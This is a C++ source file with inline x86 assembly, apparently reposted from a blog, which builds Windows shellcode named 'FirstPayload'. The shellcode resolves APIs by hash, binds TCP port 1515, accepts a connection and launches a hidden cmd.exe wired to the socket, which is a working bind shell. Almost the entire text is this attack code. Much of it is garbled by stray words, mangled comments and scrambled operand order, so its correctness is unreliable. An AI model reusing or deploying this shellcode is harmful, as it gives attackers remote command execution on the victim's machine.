FirstPayload

// FirstPayload.cpp: This file contains the "main" function. Program execution will begin and end here. 
// #include "pch.h" #include <the iostream> int main () { the __asm { the SUB the ESP, 0x20 // open period of stack space, increased robustness Push EBP MOV EBP, ESP Sub ESP, 0x10 the JMP tag_Shellcode / / pre-code, to avoid later data is interpreted as instructions // cmd.exe // [tag_Next-0x25] _asm _emit (0x63) _asm _emit (0x6D) _asm _emit (0x64) _asm _emit (0x2E) _asm _emit (0x65) _emit _asm (0x78) _asm _emit (0x65) _asm _emit (0x00) // ws2_32.dll \ 0         // [tag_Next-0x1D] _asm _emit (0x77) _asm _emit (0x73) _asm _emit (0x32) _asm _emit (0x5F)






















_emit _asm (0x33) _asm _emit (0x32) _asm _emit (0x2E) _asm _emit (0x64)
_asm _emit (0x6C) _asm _emit (0x6C) _asm _emit (0x00)

// Kernel32.dll
// [tag_Next-0x12]
_asm _emit ( 0x6B) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x6E)
_asm _emit (0x65) _asm _emit (0x6C) _asm _emit (0x33) _asm _emit (0x32)
_asm _emit (0x2E) _asm _emit (0x64) _asm _emit ( 0x6C) _asm _emit (0x6C)
_asm _emit (0x00) tag_Shellcode: //1.GetPC the CALL tag_Next tag_Next: POP // EBX BaseAddr MOV [EBP-0x04], EBX // LOCAL_1 = shellcode BaseAddr // 2. The key acquisition module base address mov esi, dword ptr fs: [ 0x30] // PEB address









mov esi, [esi + 0x0C] // pointer pointing PEB_LDR_DATA
mov esi, [esi + 0x1C] // module list pointer
mov esi, [esi] // second access list entry
mov edx, [esi + 0x08 ] // Get Kernel32.dll base address
// 3. Get the address of LoadLibraryExA
Push the ImageBase = // EDX Kernel32.dll
Push @ nHashDigest 0xC0D83287 = LoadLibraryExA Digest
Call fun_GetFunAddrByHash // custom function to find a hash function address value
EDI MOV, EAX LoadLibraryExA // // 4. loading Kernel32.dll, enhanced compatibility (Win7 achieved are KernelBase.dll base address) LEA ESI, [EBX-0x12] // Kernel32.dll \ 0 Push 0 / / / -dwFlags = 0




0 // Push | = 0 -hFile
Push ESI @ | = -lpLibFileName Kernel32.dll
Call EDI // LoadLibraryExA ()
MOV [EBP-0x08], EAX = Local2 Kernel32.dll base address @ @ 5. Load ws2_32.dll behind to facilitate network communications programming LEA ESI, [EBX - 0x1D] ws2_32.dll // \ 0 Push // 0 / = 0 -dwFlags Push // 0 | 0 = -hFile Push ESI // | -lpLibFileName ws2_32.dll = Call EDI // LoadLibraryExA () MOV [EBP - 0x0C], EAX = ws2_32.dll group address @ local3 // Payload portion 6. Run










push [ebp-0x0C] // ws2_32.dll base address
push [ebp-0x08] // Kernel32.dll base address
Push [EBP-0x04] // BaseAddr
Call fun_Payload // // 7.Payload finished, the program ends , prevent the debug analysis Push [EBP-0x08] // = IMAGEBASE of PARAM_2 (Kernel32.dll) Push 0x4FD18963 nHashDigest // = the ExitProcess Digest Call fun_GetFunAddrByHash // fun_GetFunAddrByHash Push // 0 / -uExitCode = NULL Call // EAX the ExitProcess () ESP mov, ebp // POP // ebp










////////////////////////////////////////////////////////////////////////
// Look up a function address by its hash value; the return value is the address of the key function
////////////////////////////////////////////////////////////////////////
fun_GetFunAddrByHash: // (nHashDigest int, int the ImageBase) Push EBP MOV EBP, ESP Sub ESP, 0x0C Push EDX // the ENT the EOT 1. Get the EAT MOV EDX, [EBP 0x0C +] // PARAM_1 (the ImageBase) MOV ESI, [EDX + 0x3C] // IMAGE_DOS_HEADER.E_LFANEW LEA ESI, [EDX + ESI] // the PE header mov esi, [esi + 0x78] // iMAGE_DIR ... EXPORT .VirtualAddress LEA ESI, [edx + ESI] // export table first address mov EDI, [ESI + 0x1C] // IMAGE_EXP ... ORY.AddressOfFunctions LEA EDI, [edx + EDI] // EAT first address mov [ebp- 0x04], edi // LOCAL_1 EAT first address














mov edi, [esi + 0x20] // IMAGE_EXP ... ORY.AddressOfNames
LEA EDI, [edx + EDI] // ENT first address
mov [ebp-0x08], edi // LOCAL_2 ENT first address
mov edi, [esi + 0x24] // ... ORY.AddressOfNameOrdinals IMAGE_EXP
LEA EDI, [EDX + EDI] @ the EOT first address
mov [ebp-0x0C], edi // EOT first address
// 2. Iterate over the function names in the ENT
xor ecx , ECX
JMP tag_FirstCmp
tag_CmpFunNameLoop:
inc is ECX
tag_FirstCmp:
MOV ESI, [EBP-0x08] // LOCAL_2e the ENT
MOV ESI, [ESI + ECX *. 4] // the ENT the RVA
MOV EDX, [EBP + 0x0C] // PARAM_1 IMAGEBASE
LEA ESI , [EDX + ESI] // the ENT VA
Push [EBP + 0x08] // = PARAM_1 parameter passing nDigest (nDigest)
Push ESI // parameter passing the ENT VA = strFunName
Call fun_Hash_CmpString // hash value comparison
Test eax, eax eax // if equal to 1, otherwise 0
// JE tag_CmpFunNameLoop notes, books jne is
found // 3. After successful sequence number corresponding
MOV ESI, [EBP-0x0C] @ the EOT LOCAL_3
XOR EDI, EDI
MOV DI, [ESI + ECX * 2] // function name with an array index to find the corresponding serial number in the array
// 4. Use the ordinal as an index to find the function address corresponding to the function name
mov edx, [ebp-0x04] LOCAL_1 the EAT //
MOV ESI, [EDX + EDI *. 4] // find the sequence number in the address corresponding to the function address of the array function
MOV EDX, [EBP + 0x0C] ImageBase PARAM_1 //
// 5. Return the address of the key function that was found
lea eax, [edx + esi] // GetProcAddress return address
POP edx
mov ESP, ebp
POP ebp
RETN 0x08 fun_Hash_CmpString: // (strFunName char *, int nDigest) the Push ebp mov ebp, ESP Sub ESP, 0x04 // open local variables and clears mov dword ptr [ebp-0x04] , 0x00






push ebx // save registers used
Push ECX
Push EDX
MOV ESI, [EBP + 0x08] // PARAM_1 (strFunName)
XOR ECX, ECX
XOR EAX, EAX
tag_HashLoop:
MOV Al, [ESI + ECX] = // Al character the first character string ecx
test al, al // determines whether 0, 0 to the end of the cycle
JZ tag_HashEnd MOV EBX, [EBP-0x04] // LOCAL_1 (Abstract) SHL EBX, 0x19 // summary << 0x19 (25 ) mov edx, [ebp-0x04] // LOCAL_1 (summary) SHR edx, 0x07 0x07 // summary >> (07) or EBX, EBX // edx | edx the Add EBX, eax + edx // character ASCII mov [ebp -0x04], EBX inc is ECX // ECX ++ JMP tag_HashLoop tag_HashEnd: MOV EBX, [EBP + 0x0C] // of PARAM_2 (nDigest)















mov edx, [ebp-0x04] // LOCAL_1 ( Abstract)
XOR EAX, EAX
CMP EBX, EDX
JNE tag_FunEnd // NOTE
MOV EAX,. 1 tag_FunEnd: POP EDX POP ECX POP EBX MOV ESP, EBP POP EBP RETN 0x08 / ////////////////////////////////////////////////// /////////////////////// // payload, the return value is NULL /////////////////// ////////////////////////////////////////////////// ///// fun_Payload: // (int BaseAddr, Kernel32_Base int, int ws2_32_Base) Push EBP MOV EBP, ESP Sub ESP, 0x300 // initialization 1. Winsock service push [ebp + 0x10] // IMAGEBASE = PARAM_3 (ws2_32. dll)


















push 0x80B46A3D // nHashDigest =WSAStartup Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
lea esi ,[ebp-0x300] // WSAData
push esi // /-lpWSAData=WSADATA
push 0x0202 // |-wVersionRequested=2.2
call eax // WSAStartup()
test eax,eax
jnz tag_PaloadEnd
// 2. Create a raw socket
push [ebp+0x10] // IMAGEBASE =PARAM_3(WS2_32.dll)
push 0xDE78322D // nHashDigest =WSASocketA Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
push 0 // /-dwFlags=0
0 // Push | = 0 -g
Push // 0 | 0 = -lpProtocolInfo
Push. 6 // | = IPPROTO_TCP go --protocol
Push. 1 // | = SOCK_STREAM -type
Push // 2 | = AF_INET -AF
Call // EAX WSASocketA ()
MOV [EBP - 0x04], EAX = SOCKET LOCAL_1 // // 3. bind a port 1515 [0x05BE -> 0XBE05] in an arbitrary address (INADDR_ANY) Push [EBP + 0x10] // = PARAM_3 IMAGEBASE (Ws2_32.dll) PUSH 0xDDA71064 = // nHashDigest the bind Digest Call fun_GetFunAddrByHash // fun_GetFunAddrByHash





Word PTR MOV [EBP-0x200], 0x02 // /SOCKADDR_IN.sin_family=AF_INET
MOV Word PTR [EBP-0x1FE], // 0xEB05 | SOCKADDR_IN.sin_port = 0xEB05 (1515)
MOV DWORD PTR [EBP-0x1FC], 0 / / \ SOCKADDR_IN.sin_addr = INADDR_ANY
LEA ESI, [ebp-0x200] // SOCKADDR_IN
the Push // 0x14 / 0x14 = -namelen
the Push ESI // | -name = SOCKADDR_IN
the Push [ebp-0x04] // | -s LOCAL_1 (socket )
Call // EAX the bind ()
Test EAX, EAX //
JNZ tag_PaloadEnd
// 4. Listen for connections; the backlog queue can hold up to five connections
push [ebp + 0x10] // IMAGEBASE = PARAM_3 (wS2_32.dll)
push 0x4BD39F0C // nHashDigest =listen Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
push 0x7FFFFFFF // /-backlog =SOMAXCONN
push[ebp - 0x04] // |-s LOCAL_1(socket)
call eax // listen()
test eax, eax
jnz tag_PaloadEnd

// 5. Accept one connection
push[ebp + 0x10] // IMAGEBASE =PARAM_3(WS2_32.dll)
push 0x01971EB1    // nHashDigest =accept Digest
call fun_GetFunAddrByHash // fun_GetFunAddrByHash
push 0 // /-addrlen =0
push 0 // /-addr =0
push[ebp - 0x04] // |-s LOCAL_1(socket)
// EAX Accept Call ()
MOV [EBP-0x04], EAX // LOCAL_1 (SOCKET) = SOCKET // 6. The process creates a CMD, and input and output socket relocated to create in our Push [EBP + 0x0C] // IMAGEBASE = PARAM_3 (Kernel32.dll) Push 0x6BA6BCC9 // nHashDigest = CreateProcessA Digest Call fun_GetFunAddrByHash // fun_GetFunAddrByHash MOV EDX, EAX // CreateProcessA LEA EDI, [EBP-0x90] // / - empty STARTUPINFOA ECX mov, 0x11 // | -STARTUPINFOA mov eax, 0x00 // | - from [ebp-0x90] start cld // | - to [ebp-0x48] the end of the rep stosd // | -












mov dword ptr [ebp-0x90],0x00000044 // |-STA...A.cb=48
mov dword ptr [ebp-0x64],0x00000100 // |-STA...A.dwFlags=startf...
mov word ptr [ebp-0x60],0x0000 // |-STA...A.wShowWindow=SW_HIDE
mov esi,[ebp-0x04] // |-LOCAL_1(SOCKET)
mov dword ptr[ebp - 0x58], esi // |-STA...A.hStdInput=SOCKET
mov dword ptr[ebp - 0x54], esi // |-STA...A.hStdOutput=SOCKET
mov dword ptr[ebp - 0x50], esi // \-STA...A.hStdError =SOCKET
lea esi,[ebp-0x90] // STARTUPINFOA
lea edi,[ebp-0x200] // PROCESS_INFORMATION
mov ebx,[ebp+0x08] // PARAM_1(BaseAddr)
lea ebx,[ebx-0x25] // cmd.exe\0

push edi // /-lpProcessInformation=PROCESS_INFORMATION
push esi // |-lpStartupInfo =STARTUPINFOA
push 0 // |-lpCurrentDirectory=0
push 0 // |-lpEnvironment=0
push 0 // |-dwCreationFlags=0
push 1 // |-bInheritHandles=1
push 0 // |-lpThreadAttributes=0
push 0 // |-lpProcessAttributs=0
push ebx // |-lpCommandLine=cmd.exe\0
push 0 // |-lpApplicationName=0
call edx // CreateProcessA()
tag_PaloadEnd: //
mov esp,ebp //
pop ebp //
retn 0x0C //





}
}



Origin www.cnblogs.com/ltyandy/p/11352494.html